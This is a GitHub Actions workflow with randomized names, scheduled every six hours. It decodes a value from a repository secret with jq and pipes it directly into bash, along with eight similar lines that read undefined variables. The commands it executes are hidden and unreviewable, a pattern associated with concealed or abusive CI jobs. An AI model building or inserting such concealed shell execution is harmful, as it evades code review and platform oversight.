name: tangbuzhi5678

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tangbuzhi5678
        env:
          oeokt04007: ${{ secrets.oeokt04007 }}
        run: |
          echo $oeokt04007 | jq -r .elaa4657 | /bin/bash
          echo $spsk29138 | jq -r .a3 | /bin/bash
          echo $ayj0 | jq -r .kq2 | /bin/bash
          echo $qy43185 | jq -r .g3167 | /bin/bash
          echo $rtvh05 | jq -r .wwkqq33665 | /bin/bash
          echo $sqco98797 | jq -r .esb441 | /bin/bash
          echo $rxias12 | jq -r .pxe1275 | /bin/bash
          echo $rjrp371 | jq -r .eb964 | /bin/bash
          echo $kc5182 | jq -r .e21 | /bin/bash

